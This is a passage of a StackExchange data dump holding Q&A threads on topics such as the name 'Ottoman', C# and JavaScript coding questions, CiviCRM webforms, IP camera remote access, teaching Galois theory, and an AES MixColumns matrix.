des Dynastiebegr\u00fcnders Osman I. her.\"`\nAnswer: The explanation seems to be related to the attempted spelling of the Arabic for Osman, which came out as utman or Uthman. From wiktionary.org\n\nFrom Middle French Ottoman, from post-classical Latin Ottomanus, from\n Ottoman Turkish \u0639\u062b\u0645\u0627\u0646, from Arabic personal name \u0639\u064f\u062b\u0652\u0645\u064e\u0627\u0646 (\u02bfu\u1e6fm\u0101n).\n Osman is the Turkish spelling of the male Arabic given name Uthman,\n therefore the Ottoman Empire is sometimes referred to as the Osman\n Empire, Osmanic Empire, or Osmanian Empire, after Osman I.\n\nIts also has been discussed here on the English Language & Usage Stack.\nAnswer: As an Arabic speaker, Osman and Uthman\/Othman are really the same name (both are Arabic\/Turkish names). So calling the nation the Ottoman Empire makes sense when comparing with the name Othman.\nAnswer: There is a very strong theory about Osmans real name being Ataman, a Turkic name and that his descendant Murad II(in whose reign the first historical records were written since the foundation)made historians record it as Osman in order to give the state an islamic feeling.\nBut of course, even if it is true, the British were absolutely unaware of this. 
So, as some others stated, it is probably taken from the French who recorded it based on the arabic spelling Uthman, and from there, it became Ottoman in English.\nComment: I would like to upvote this when a source is provided.\n","meta":{"source":"history.stackexchange","title":"Why is it called the \"Ottoman\" Empire in English language?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Check String of chars\n\nQuestion: I'm looking for an fast method-solutions of my Problem to check a String, if this contains an min one char. IF String contains like any one of character in alphabet then return true, else false.\n<code>public bool checkString(String s)\n{\n return true || false;\n}\n<\/code>\nFor Example:\n<code>\"1232133432454355467\" return false \n\"134324239846c\" return true\n<\/code>\nComment: why not **String.Contains** ?\nComment: Are you wanting to check that a String is alphanumeric, or that it contains more than one character? Or both? Please explain yourself better.\nComment: not alphanumeric just only char.\nComment: Each non-emtpy string contains `char`. `char` is a type in C# representing any character. I guess you actually mean letter.\nAnswer: Try:\n<code>using System;\nusing System.Text.RegularExpressions;\n\nclass Program\n{\n static void Main()\n {\n var r = CheckString(\"112\");\n Console.WriteLine(r); \/\/ false\n r = CheckString(\"112a\");\n Console.WriteLine(r); \/\/ true\n }\n\n public static bool CheckString(String input)\n {\n return Regex.Match(input, @\"[a-zA-Z]\").Success;\n \/\/ or, as @Vlad L suggested\n \/\/return Regex.IsMatch(input, @\"[a-zA-Z]\");\n }\n}\n<\/code>\nIf you want to verify against the \"All Letters\" Unicode character class, use this one instead:\n<code>return Regex.IsMatch(input, @\"\\p{L}\");\n<\/code>\nReference: Supported Unicode General Categories\nComment: Or simply `return Regex.IsMatch(input, @\"[a-zA-Z]\");` :)\nAnswer: If I understood the question correctly... This returns true if the string contains at least one letter.\n<code> public bool checkString(String s)\n {\n return s.Any(x => Char.IsLetter(x));\n }\n<\/code>\nAnswer: Try this with ToCharArray():\n<code>public bool checkString(String s)\n{\n bool retValue = s.ToCharArray()\n .Any(c => ((int)c > 64 && (int)c < 91) || \n ((int)c > 96 && (int)c < 123));\n return retValue\n}\n<\/code>\nAnswer: Just for sake of completion.\n<code>\/\/ Regex to check the value consists of letters\n\/\/ with atleast 1 character\nprivate static Regex reg = new Regex(@\"[a-zA-Z]+\");\n\npublic bool checkString(String s)\n{\n return reg.Match(s).Success;\n}\n<\/code>\nAnswer: What about this?\n<code>if (Regex.IsMatch(yourString, \"[a-zA-Z]\"))\n{\n}\n<\/code>\nComment: Ye, sorry - I didn't understand what he wants. I saw after he updated his post. Corrected\nAnswer: <code>static void Main(string[] args)\n {\n Console.WriteLine(checkString(\"137563475634c756\"));\n }\n static public bool checkString(String s)\n {\n return Regex.IsMatch(s, \"[a-zA-Z]\");\n }\n<\/code>\nIt Returns True.\n","meta":{"source":"stackoverflow","title":"Check String of chars","dup_signals":{}},"subset":"stackexchange"} +{"text":"Prefill webform with civicrm activity data\n\nQuestion: I want to prefill a webform with data from a specific CiviCRM activity in order to edit the activity using the webform. I want to do this by having an \"Edit\" link in a Drupal View of CiviCRM activities. These activities may or may not be associated with a case, so let's assume they aren't. 
I've turned on \"Update Existing Activity\" in the webform for all of the statuses.\nCan someone confirm that I can do this, and if so, what is the proper form of the URL for the link in the view? I've tried a bunch of different ones and can't seem to get it.\nComment: What about VBO to modify a field ?\nComment: For Bulk operations - absolutley. But it's a lot of overhead to update a single activity.\nComment: Guy: did you have a chance to review the screenshots I posted? Let me know of there is anything else I can add to help you make this work.\nAnswer: Below please find some screenshots to illustrate how to do this:\n1. This is a View of Activities. Each Activity has an Update button [that's a Global: Custom Text field -> Text Update; Rewrite results: Output this field as a link -> to the webform URL with <code>case-worker-form?cid2=[contact_id]&aid=[id]<\/code> and bootstrap classes btn to make it a button] -> the URL that is constructed is <code>case-worker-form?cid2=41218&aid=19153<\/code>\n\n2. The webform case-worker-form -> receives this data. That form is set up such that cid1 = the logged in user (the social worker); cid2 = the client; aid = activity id of the activity to be updated; \n\n3. Let's edit the subject e.g. -> \n\n4. Result:\n\n5. Note the Webform just has Update Existing Activity set to None (as we're matching by aid)\n\nAdd on:\nI've double checked that this is (still) working on our latest webform civicrm 5.x\n<code>root@f4d0afb6c36d:\/var\/www\/html\/sites\/default\/modules\/webform_civicrm# git log\ncommit 76b444bf5192ddf4663a0222540684a230d8e39e\nMerge: b54ddfd ef2a518\nAuthor: Karin Gerritsen <KarinG>\nDate: Thu Sep 12 11:24:26 2019 -0600\n Merge pull request #251 from colemanw\/rel7\n Use api to retrieve relationship data\n<\/code>\nAdd - on config notes:\n\nensure your views field is configured such that commas are stripped from cid and aid before passing them into the webform\nensure your webform is configured to allow an activity of the type you want updated -> setting it to -user select- will ensure that\nComment: I figured out why mine wasn't working. Seems obvious now, but I missed it. On ANY contact field that you are sending the info for in the URL, you have to check the \"Use contact id from URL\" checkbox under \"Default value\" for that webform field. If any of the contact fields that you sending the value for do not have that box checked, none of the form will load. So the final form of the URL I used was https:\/\/yourdomain\/yourwebform?cid2=xxx&aid=xxx&cid1=xx. Thanks for the help.\nComment: Yes passing cid via arguments does require the Contact Element to be configured as such. Happy to hear you got things working.\nAnswer: Having \"Update Existing Activity\" setting turned on, prefills the form with the matching activity based on Type and Status. In case of multiple activities, it prefills\/updates the first one.\nAdding '&activity1=activityID' in your webform url, irrespective of the 'Update Existing Activity' setting, will prefill and update the activity (with id=activityID).\nIn case of revisioning you might need to provide latest activity ID in url or it might not work. Think you could have some custom code or configuration in view to fetch the latest activity id for a contact, to make it work.\nAnswer: This should work but is a bug in the latest version of Webform CiviCRM. Will open a ticket. \n(Update)\nWebform requires that the form is configured a certain way on the civicrm\u00a0tab for activities in order to load the activity. 
It appears that at least 1 contact on the form needs to be set as a participant on the webform for the autoload to work. nb. I'm going to investigate further if other combinations will or will not work. \nComment: I think this is right. I've tried all the iterations for the URL and I can't get it to work.\nComment: If you think there is a bug please do let us know - we've got this working on a number of sites though; URLs in this format: case-worker-form?cid2=41218&aid=19153 work fine as long as the receiving webform is configured properly.\nComment: I just ran a test with our webform civicrm 5.x latest - commit 76b444bf5192ddf4663a0222540684a230d8e39e\nMerge: b54ddfd ef2a518 Author: Karin Gerritsen \nDate: Thu Sep 12 11:24:26 2019 -0600\nMerge pull request #251 from colemanw\/rel7 - and all is working well. Will add screenshots to my answer.\nComment: Jamie: can you please either open an issue with details on how to reproduce or acknowledge there is no bug - that passing on aid in URL works as described by me in both 4.x and 5.x?\nComment: Hi @karinG-SemberIT - Sorry ran out of time last week. I've done some more investigating and it seems that the activity ID is loaded but only in certain scenarios where the source\/target\/assignee fields are being set by the form. There may also be a bug with the \"none\" option. In your example above you set the activity participants to be contacts on the form.\nComment: I'm going to do some more investigating to see what those precise scenarios are as my sense is that the activity should load even if you don't set these fields, as there is good reason that you may not want to change the source, assignee or with fields on the form. I'm also not sure if it works with multiple activities. Will report back in the next few days.\nComment: Hi Jamie - You will need to pass on the cid2 for the Activity Target (if your webform config has a cid1 as logged in user) -> but you can then decide to disable [see my example] or hide that from the form if in your workflow target is not supposed to be edited; Assign to can be handled similarly; Re: multiple activities - we don't have a pathway for ?aid1, ?aid2 to be added as arguments. If you want to e.g. complete all activities of a certain type e.g. then best to use Views Bulk Operations.\nComment: I still don't have this working either. Just getting back to reviewing the latest notes here. Will investigate over the next few days and report.\nComment: Per my comment above on the main answer, double check that \"Use contact id from URL\" is checked for all contacts on the webform. If it isn't on even one contact field, the entire form won't load.\n","meta":{"source":"civicrm.stackexchange","title":"Prefill webform with civicrm activity data","dup_signals":{}},"subset":"stackexchange"} +{"text":"doxygen auto reference external links?\n\nQuestion: I use some external libraries in my project, e.g. 
libev.\nI realize I can use markdown (or href) and put\n [libev](http:\/\/software.schmorp.de\/pkg\/libev.html)\nin my document.\nHowever that only works in a single place, and I don't want to have to put that in the dozens of places I refer to libev.\nIf it's \"ClientWatcher\" (one of my classes), doxygen auto links to the class.\nIs there some way to tell doxygen to make all occurrences of the word \"libev\" auto link to http:\/\/software.schmorp.de\/pkg\/libev.html (for example)\nAnswer: If you add\n<code>ALIASES += libev=\"<a href=\\\"http:\/\/software.schmorp.de\/pkg\/libev.html\\\">libev<\/a>\"\n<\/code>\nto Doxygen's configuration file you can use the <code>\\libev<\/code> command to generate a link, like so\n<code>\/** @mainpage\n * See \\libev for more info.\n *\/\n<\/code>\nComment: I considered trying this. Not quite what I wanted, but certainly an improvement over specifying it in lots of places.\n","meta":{"source":"stackoverflow","title":"doxygen auto reference external links?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Editing closed or off topic questions\n\nQuestion: I have made a few edits to questions that were closed or off topic, I always ask the OP if they are happy with the edit, and only offer it, after it's received a bit of attention and there seems to be no editing, or if I know the OP and we discuss help with editing.\nDoes a dog's pink or white skin need special care?\nWhy should I not give water or food to a wounded bird?\nWhat is causing behaviour changes in our young adult dog?\n\nHow does the community feel about this type of editing? \nIn these early stages, it is a small group we are trying to get our site organised; but how should we proceed with this as the site grows?\nComment: Whether or not you think you can interpret the OPs intent or not, it is important to remember that you aren't the OP, so drastic edits need to still be avoided.\nComment: @LucyGalv\u00e1n if you are unhappy with the current wording, you can click the `edit` button below the question (or [here](http:\/\/pets.stackexchange.com\/posts\/575\/edit)). It is quite common that questions are edited by members of the community to improve their quality. However if you are unhappy with an edit you are free to roll back any changes made. You can do that by clicking on the link \"edited Oct 12 at 16:22\" which will bring you to the revision history of the post. There you can chose a revision and click rollback. If you need more help you can always drop by in [chat].\nComment: So... Should I re-write the question? I didn't understand the changes so that's why I didn't want to interfere. How can I fix this?\nComment: @LucyGalv\u00e1n does the question, as it is currently worded adequately ask your question? Or is it different from what you intended to ask?\nComment: It seems they are talking about a specific dog but it seems that it doesn't change what I intended to ask in the first place.\nComment: @LucyGalv\u00e1n I didn't think you were discussing a specific dog, but asking a general question about skin type. If you are happy with the edit, then there is nothing for you to worry about. It's only if I had edited it to change what you were trying to ask.\nAnswer: One thing to avoid is to change the intent of the question completely. 
Edits that are too radical or change the fundamental intent of the question should not be acceptable - some questions are just not repairable, and sometimes we have to ask new questions or risk completely changing the OP's question, which is something we don't want to do. \nSometimes, we can't fix a question and being it off of the on hold status. That is alright - we can't save everything. \nMaking some attempt to correct a question to make it fit is alright, but changing the question or adding details that only the OP would be able to confirm or know about is not a very good idea - the point of editing is to make adjustments, not to change things completely. \nIt is entirely possible a question will be on hold for a day or more or perhaps forever (especially if it is considered off topic). While it is not ideal, it is just the way it goes - we can't make everything work, as much as we would like to. \nWe are attempting to create a good solid base of awesome questions, and editing is part of that! But we also don't want to change the intent of the question or make it completely unrecognizable from what the OP was actually trying to ask (unless it is poorly written, etc). \nThis is one of those cases where we don't want to treat edits now any different than the edits we do later when the site is in public beta. We want good edits that improve questions, not change them or make assumptions about things that we really have no way of knowing. \nComment: Coming across off-topic questions also helps people realise what's not on topic.\n","meta":{"source":"pets.meta.stackexchange","title":"Editing closed or off topic questions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Clustering algorithm for obtaining equal sized clusters\n\nQuestion: I am trying to form clusters around medoids using PAM algorithm in R. Is there anyway of fixing the cluster size for PAM (somewhat bruteforce the cluster size) ? Are there any other clustering algorithms that will provide equal sized clusters for medoids ?\nThank you in advance for your help.\nComment: Duplicate to: http:\/\/stats.stackexchange.com\/questions\/8744\/clustering-procedure-where-each-cluster-has-an-equal-number-of-points\nComment: Special case of duplicate: [Optimal grouping\/clustering of items in groups with minimum size](http:\/\/stackoverflow.com\/questions\/37589168\/optimal-grouping-clustering-of-items-in-groups-with-minimum-size)\nComment: Hi @Lawrence did you get any answer to this problem? I'm looking for an R implementation of such algorithm, but couldn't find any. thanks\nAnswer: You can modify a clustering algorithm to suit your needs.\nYou can follow this Tutorial for Same-Size K-Means, or simply use this algorithm from the <code>tutorial<\/code> package\/module in ELKI (build the latest version from GitHub, because I just fixed a bug there - this will be included in ELKI 0.7.2).\nEssentially, this algorithm performs a k-means style least-squares optimization, but all clusters must have the same size (if N\/k is not integer, the cluster sizes may vary by 1).\nIf you go to above tutorial and scroll to the bottom, you can see example results.\nComment: Thank you for your answer. Unfortunately I am working with a dissimilarity matrix (I do not have coordinates to be able to use kmeans). My data is in the form objects and a weight is attributes to each pair. That's why I am using PAM. I have however developed my own clustering algorithm appropriate to my problem. Will post it when I finish coding. 
Thanks again !\nComment: You can essentially follow the tutorial, but work with KMedoidsEM instead of KMeans. It's similar to k-means but uses the medoid like PAM. With above modifications, you will get a k-medoids that ensures clusters have the same size.\n","meta":{"source":"stackoverflow","title":"Clustering algorithm for obtaining equal sized clusters","dup_signals":{}},"subset":"stackexchange"} +{"text":"JavaScript - I can't save the value of a variable after a loop\n\nQuestion: I want to save the value of a variable in a loop and continue to use it, but I don't know how to do it\n<code>function slide(){ \n var picter = document.getElementsByClassName(\"picter\");\n var g=0;\n var c=0;\n for(var i=0;i<picter.length;i++){ \n if(getComputedStyle(picter[i]).opacity == 1){\n picter[g].style.opacity = 0;\n g+=1;\n picter[g].style.opacity = 1;\n break;\n }\n }\n \/\/alert(g);\n}\n\n<div class=\"slider\" >\n <a class=\"back arrow\" onclick=\"slide()\">Back<\/a>\n\n <div class=\"picterSlider\">\n <div class=\"picter picterLeft\">Left<\/div>\n <div class=\"picter picterCenter\">Center<\/div>\n <div class=\"picter picterRight\">Right<\/div>\n <\/div>\n\n <a class=\"next arrow\" onclick=\"slide()\">Next<\/a>\n<\/div>\n<\/code>\nI tried to set to another variable, but it does not work(\nComment: What exactly are you trying to achieve with this code ? It is not clear to me what variable are you trying to set or what for.\nComment: Which variable exactly do you want to save after the loop? the only variable i see you might want to save is `i`. so clarify which variable in the loop do you want to save after the loop execution.\nComment: I need the variable g to retain its value after the loop and to use the stored value in the next use of the loop\nAnswer: You can set variable as a global variable\n<code>var picter;\nvar g=0;\nvar c=0;\nfunction slide(){ \n = document.getElementsByClassName(\"picter\");\n\n for(var i=0;i<picter.length;i++){ \n if(getComputedStyle(picter[i]).opacity == 1){\n picter[g].style.opacity = 0;\n g+=1;\n picter[g].style.opacity = 1;\n break;\n }\n }\n \/\/alert(g);\n}\n\n<div class=\"slider\" >\n <a class=\"back arrow\" onclick=\"slide()\">Back<\/a>\n\n <div class=\"picterSlider\">\n <div class=\"picter picterLeft\">Left<\/div>\n <div class=\"picter picterCenter\">Center<\/div>\n <div class=\"picter picterRight\">Right<\/div>\n <\/div>\n\n <a class=\"next arrow\" onclick=\"slide()\">Next<\/a>\n<\/div>\n<\/code>\nOr you also can save your value of variable into <code>localstorage<\/code>. And everytime you want to use, you can retrive it from <code>localstograte<\/code>\nComment: ahhahah, sorry for such an idiotic question) I'am firsting programmist\nAnswer: I think I see what you're trying to do here, you could have a look on the snippet with the comments and I'd be happy to answer any of your questions if any.\n\n<code>\/\/ Define g globally\nvar g = 0;\n\nfunction slide(increment) {\n var picter = document.getElementsByClassName(\"picter\");\n var c = 0;\n for (var i = 0; i < picter.length; i++) {\n if (getComputedStyle(picter[i]).opacity == 1) {\n picter[g].style.opacity = 0;\n g += increment;\n \n \/\/ Make sure g doesn't get below 0\n g = g < 0 ? 0 : g;\n \n \/\/ Make sure g doesn't go beyond the last element\n g = g > picter.length - 1 ? 
picter.length - 1 : g;\n picter[g].style.opacity = 1;\n break;\n }\n }\n \n alert(g);\n}<\/code>\n<code><div class=\"slider\">\n <a class=\"back arrow\" onclick=\"slide(-1)\">Back<\/a>\n\n <div class=\"picterSlider\">\n <div class=\"picter picterLeft\">Left<\/div>\n <div class=\"picter picterCenter\">Center<\/div>\n <div class=\"picter picterRight\">Right<\/div>\n <\/div>\n\n <a class=\"next arrow\" onclick=\"slide(1)\">Next<\/a>\n<\/div><\/code>\n","meta":{"source":"stackoverflow","title":"JavaScript - I can't save the value of a variable after a loop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Impossibility of trisecting the angle, doubling the cube and alike, what are reasons for or against discussing them in a course on algebra?\n\nQuestion: When I taught courses on algebra giving a first exposition to Galois theory I usually included some discussion of classical results showing the impossibility of constructing certain points with ruler and compass, such a the cube root of $2$ (Delian problem) and the trisection of a (generic) angle. \nHowever, sometimes I think maybe this is not that good an allocation of time. It took me quite some time to recall and\/or to introduce in precise terms what it means to construct something, which feels a bit like an isolated subject in such a course. Likewise, the results, while historically important and interesting, do not seem of much use later on.\nSince as said I did include the subject, needless to say, I can also see some merit in it. Yet, I never quite managed to make up my mind. \nThus, I would like further input on this subject:\nWhat are reasons for or against teaching the impossibility of certain geometric constructions in a course on algebra that covers the basics of Galois theory?\nComment: These are proved in Cox's *Galois Theory* as Examples 10.1.9, 10.1.10, and (squaring the circle) 10.1.11. The lead-up only takes about 6 pages, after which they are all captured in one fell-swoop (though they refer back to earlier examples\/theorems; the one accept-without-proof, for squaring the circle, is that $\\pi$ is transcendental). Looking back over this material, and depending on class size \/ interest, I wonder whether you could have a day in which students presented (in small groups) on these three examples. Practice \"filling in the details\" might be a reason to spend time on them.\nComment: @BenCrowell there'd remain what is arguably the original motivation namely the (un)solvability of polynomial equations by radicals. But I *agree* that the classical results are interesting.\nComment: When I took the required course covering Galois theory, it seemed to me like the most useless and silly thing I had ever studied. The classical results you're talking about were the only applications we ever saw that gave me any hint of why anyone would care about the subject -- and even they seemed to me like extremely weak motivation. If you didn't use these topics as motivation, what *would* you tell your students was the reason they should care about Galois theory?\nComment: Will you choose whether the question is about \"a course on Galois theory\" (as at the end of the post), or \"a course on algebra\" (as in the title)? For the first, I'd include these classical topics; for the second, I'd replace Galois theory with other algebraic topics entirely. So my answer depends on which question you're asking.\nComment: @MattF. 
thanks I agree it was unclear, I edited it a bit It is somewhat in the middle; the context is a course on algebra that includes basics of Galois theory, basically builds up to them. Not to cover Galois theory is a non-option but it could be deemphasized in order to have a time for other things. (The later is basically what I am thinking about and motivated this question.)\nComment: @BenjaminDickman thanks for the reference and the other input. I will check it out soon.\nAnswer: Let me first say how I have taught this, and then why it was worth doing.\nHere is the stripped down version I speak of. The first block of bullet points is one day.\n\nForget about straight edge and compass, no one uses them. Fortunately, I think we still have another few years of students who have still seen the standard five function calculator: $+$, $-$, $\\times$, $\\div$, $\\sqrt{ \\ }$. So the question was: using these keys, and the ability to type in integers or recopy numbers that you have computed before, what can you compute? Can you compute $\\sqrt[3]{2}$, or $\\cos (20^{\\circ})$? \nWe'll show that the answer is no! Suppose that we could compute $\\sqrt[3]{2}$. Let $\\theta_1$, $\\theta_2$, ..., $\\theta_N$ be the sequence of numbers displayed on our calculator. So each $\\theta_i$ is made up of one or two previous $\\theta_i$, using the five operations above. \nLet $K_i$ be the field $\\mathbb{Q}(\\theta_1, \\theta_2, \\ldots, \\theta_i)$. Then $[K_{i+1}:K_i]=1$ or $2$ for each $i$. So $[K_N:\\mathbb{Q}]=2^r$ for some $r$.\nIf $\\sqrt[3]{2} \\in K_N$, then $\\mathbb{Q}(\\sqrt[3]{2}) \\subseteq K_N$. But then $3 = [\\mathbb{Q}(\\sqrt[3]{2}):\\mathbb{Q}]$ divides $2^r$, a contradiction.\nTell students that the historical version of this problem is using straight-edge and compass, not calculators. \n\nHere ends that day, but later follow up:\n\nAfter we have introduced Galois groups, have them prove the converse: If $\\mathrm{Gal}(K\/\\mathbb{Q})$ is a $2$-group, then elements of $K$ can be constructed using the $5$-function calculator.\nWork out the construction of the $17$-gon using the above.\nWhen we get to solvability, point out that \"$2$-group\" means \"all Jordan-Holder constituents are $\\mathbb{Z}\/2\\mathbb{Z}$\", and that we are now looking for an analogous description of fields that involve any radical extension.\n\nThe most recent time I taught this course, I did it as an IBL class. Here is the main worksheet corresponding to this material.\n\nSo, why do I think this was worth it? \n\nI think it is a moderately interesting question, and it can be attacked just using basic field theory tools like degree of an extension and minimal polynomials. It's nice to reach an application before we bring in the Galois groups. If you've never seen it done, the idea of proving that no formula exists can seem like a miracle, and the quintic case is hard enough that I don't think most students internalize the full argument.\nThe story about sequentially computing a sequence of numbers on your calculator makes the tower of field extensions natural.\nThe followup of proving that \"Galois group is a $2$-group\" implies \"tower of square root extensions\" is a good preparation for Kummer theory. It also makes the question \"what criterion describes a tower of radical extensions\" natural.\nComment: This is a creative solution! I remember it from a previous comment of yours. 
Do you have an opinion on the broader question -- do you think Galois theory merits a place in a one-year undergraduate algebra curriculum, or would you rather emphasize material more relevant to coding, computer graphics, cryptology, physical symmetries? See here for discussion: http:\/\/math.stackexchange.com\/questions\/449066\nComment: The calculator motivation is a good idea, thanks for sharing it. Re what @MattF. said: http:\/\/matheducators.stackexchange.com\/questions\/2612\/galois-theory-necessary is also related but focused on a specific context. Maybe there is room for another question along these lines.\nComment: On the one hand, I love this idea. On the other hand, none of my students has a calculator with a square-root button. Instead, they have calculators with something like a square-root-rounded-off-to-thirteen-digits button. I'd expect the brighter ones to realize that your analysis is irrelevant to the question of whether their calculators can accurately find the first thirteen digits of the cube root of 2.\nAnswer: Perhaps rather than spend time establishing that trisecting an angle is impossible via Euclidean (ruler-compass) constructions,\nyou could instead (a)\u00a0Make that claim without proof,\nand (b)\u00a0Mention that different axioms do permit angle trisection: \n\n\u00a0 \u00a0\n\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \n\n(Figure from Geometric Folding Algorithms: Linkages, Origami, Polyhedra, p.286.)\n\nThis would (temporarily) turn the topic away from Galois theory and toward the history and philosophy of mathematics, which could be an illuminating interlude.\nYou could even have the students trisect an angle in-class via Abe's construction! :-) ~15 minutes.\nComment: @quid: Alperin, Roger C. \"A mathematical theory of origami constructions and numbers.\" *New York J. Math* 6.119 (2000): 133. ([PDF download](http:\/\/nyjm.albany.edu\/j\/2000\/6-8.pdf).): \"In this article we give a simplified set of axioms for mathematical\norigami and numbers. The axioms are hierarchically structured so that the\naddition of each axiom, allowing new geometrical complications, is mirrored in\nthe field theory of the possible constructible numbers. The fields of Thalian,\nPythagorean, Euclidean and Origami numbers are thus obtained using this set\nof axioms.\"\nComment: @quid I'm not sure what text you are using, but you might check Cox's *Galois Theory*. Chapter 10 is entitled \"Geometric Constructions\" and includes an optional section, 10.3, called \"Origami.\" (The first reference provided in that section is the R.C. Alperin paper suggested by JO'R above!)\nComment: That's an interesting idea. It also makes me wonder what (if any) the characterization of the points constructible in this way would be. (But this is another question.)\nComment: Thanks a lot for this reference. This looks very interesting for my purpose.\nComment: @quid: See *Some Remarks on Conic Constructible Numbers* on pp. 6-7 of my manuscript [**A Detailed and Elementary Solution to** $x^{17}=1$](http:\/\/pballew.net\/Constructable_17gon.pdf). 
Briefly, these are numbers that can be obtained by using finite sequences of the four arithmetic operations along with the operation of \"solving cubic equations\" starting with the rationals, in the same way that the constructible numbers can be obtained by using finite sequences of the four arithmetic operations along with the operation of \"solving quadratic equations\" starting with the rationals.\nComment: I just noticed that the link I gave in my previous comment is no longer valid. Here's a copy I stuck in Reseach Gate a while back: [**A Detailed and Elementary Solution to** $x^{17} = 1$](https:\/\/www.researchgate.net\/publication\/316692623_A_detailed_and_elementary_solution_to_x17_1).\n","meta":{"source":"matheducators.stackexchange","title":"Impossibility of trisecting the angle, doubling the cube and alike, what are reasons for or against discussing them in a course on algebra?","dup_signals":{}},"subset":"stackexchange"} +{"text":"IP cameras are viewable in home Wifi and REMOTE Wifi, but not in 3G?\n\nQuestion: I was in the process of setting up my IP camera port forwarding so I can view them remotely, but to my surprise, it's already working somewhat, but only if I am on a remote\/external wifi, not on a non-wifi network such as my iphone data plan. How is this even possible!?? \nHere's my set up:\n\nA Google Wifi is hardwired to my u-verse router. u-verse wifi is off so GWF is the exclusive wifi that my IP cams are connected to at home\nI was able to view the cameras when I was at the home WIFI, but not when I am on data (as expected), so I proceeded to set up remote access\/port forwarding\nDid the static IP on both cameras GUI\nSet up DHCP IP reservations and port forwarding on my GWI GUI(for only one of the cameras, just to ensure the first one would work)\nStill couldn't see my camera on my iphone when it's on data plan. Was told by Google support that I would also need to port forward my GWF within the u-verse router, which I haven't done, but will do later tonight. So my cameras should still be protected, right?\nTo my surprise, when I am at work, thus using a different, external, and remote Wifi, I could actually see BOTH cameras. If I get off the work wifi, for example, using the phone's data network, I couldn't see the cameras (as I would expect until I complete step 5).\n\nSo how is this even possible? It's as if it's treating my work's wifi the same as my home wifi, which of course is impossible. The only thing that would give it away is the static IP and DHCP IP reservations, but why does it only work on wifi but not on data? Can someone please explain to me? Is there a security issue with my network? Thanks!\nAnswer: It sounds as though the client application you are using on your phone is only allowing connections over WiFi and not via 3G. Video feeds do use quite a bit of data relative to other phone applications. This may be something you can configure within the app to allow the video feed to work via 3G.\nMany phone applications treat their WiFi connections and the telcom network connections very differently in many ways. Not knowing more about your situation I would verify the app's settings and also it's support for streaming video over 3G. \nOn the security side: When you open this to the Internet you have given the world attack surface on your network. There are numerous bugs and security issues with typical remote cameras. Do be aware that other people may one day be able to access this as well. 
Likewise, do consider that they may also use this device to pivot into other devices on your network.\nComment: There is a great talk about this on Youtube: https:\/\/www.youtube.com\/watch?v=B8DjTcANBx0\n","meta":{"source":"security.stackexchange","title":"IP cameras are viewable in home Wifi and REMOTE Wifi, but not in 3G?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to detect the state of a ProgressDialog\n\nQuestion: My Activity checks for internet connectivity and displays a ProgresDialog if there's connectivity.\nNow, if the ProgressdlDialog is showing and internet connectivity becomes unavailable, the poor ProgressDialog keeps loading till enternity.\nSo, I want detect the state of the progressdialog; and then show an AlertDialog if it's loading and internet connectivity becomes unavailable .\nAnswer: You could use CONNECTIVITY_CHANGE Receiver, to know when connectivity change and than use a method to get the actual state of your connection using below code : \n<code>ConnectivityManager cm =\n (ConnectivityManager)context.getSystemService(Context.CONNECTIVITY_SERVICE);\n\nNetworkInfo activeNetwork = cm.getActiveNetworkInfo();\nboolean isConnected = activeNetwork != null &&\n activeNetwork.isConnectedOrConnecting();\n<\/code>\nRefer to : http:\/\/developer.android.com\/intl\/pt-br\/training\/monitoring-device-state\/connectivity-monitoring.html\nhttp:\/\/viralpatel.net\/blogs\/android-internet-connection-status-network-change\/\nAnswer: To detect the ProgressDialog\n<code>ProgressDialog progressdialog = new ProgressDialog(getActivity());\nprogressdialog.show();\nif(progressdialog.isShowing())\n{\nprogressdialog.dismiss();\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to detect the state of a ProgressDialog","dup_signals":{}},"subset":"stackexchange"} +{"text":"A Lightweight Matrix Suggestion for MixColumns State of AES\n\nQuestion: We know that the matrix in the MixColumns state of AES is the circulant MDS matrix $C=circ(2,3,1,1)$ which is defined over $GF(2^8)$ with the irreducible polynomial $f=x^{8}+x^{4}+x^{3}+x+1$. Let we show the elements of $GF(2^8)$ with positive integer numbers. For example, when we assume that the elements $2$, $3$ and $4$, we mean $\\alpha$, $\\alpha+1$and $\\alpha^2$ where $\\alpha$ is a root of $f$. Consider the following matrix over $GF(2^8)$\n$$\nA= \\left(\n \\begin {array}{cccc}\n 2&1&1&1\\\\\n1&1&3&2\\\\ \n1&3&4&1\\\\ \n1&2&1&3\n\\end {array}\n \\right)\n$$\nAll squarer sub-matrices of $A$ are non-singular or in the other words $A$ is an MDS(super-regular) matrix over $GF(2^8)$. 
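As a sanity check, this claim can be verified by brute force; the following is a small illustrative sketch in plain Python (the $GF(2^8)$ arithmetic is written out by hand for the polynomial $f$ given above) that tests every square submatrix of $A$ for a nonzero determinant:\n<code>from itertools import combinations\n\ndef gf_mul(a, b):                # multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1\n    p = 0\n    for _ in range(8):\n        if b & 1:\n            p ^= a\n        carry = a & 0x80\n        a = (a << 1) & 0xFF\n        if carry:\n            a ^= 0x1B\n        b >>= 1\n    return p\n\ndef gf_det(M):                   # Laplace expansion; in characteristic 2 the signs vanish\n    if len(M) == 1:\n        return M[0][0]\n    det = 0\n    for c in range(len(M)):\n        minor = [row[:c] + row[c + 1:] for row in M[1:]]\n        det ^= gf_mul(M[0][c], gf_det(minor))\n    return det\n\nA = [[2, 1, 1, 1], [1, 1, 3, 2], [1, 3, 4, 1], [1, 2, 1, 3]]\n\ndef is_mds(M):\n    n = len(M)\n    return all(gf_det([[M[r][c] for c in cols] for r in rows]) != 0\n               for size in range(1, n + 1)\n               for rows in combinations(range(n), size)\n               for cols in combinations(range(n), size))\n\nprint(is_mds(A))                 # prints True if the claim above holds\n<\/code>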
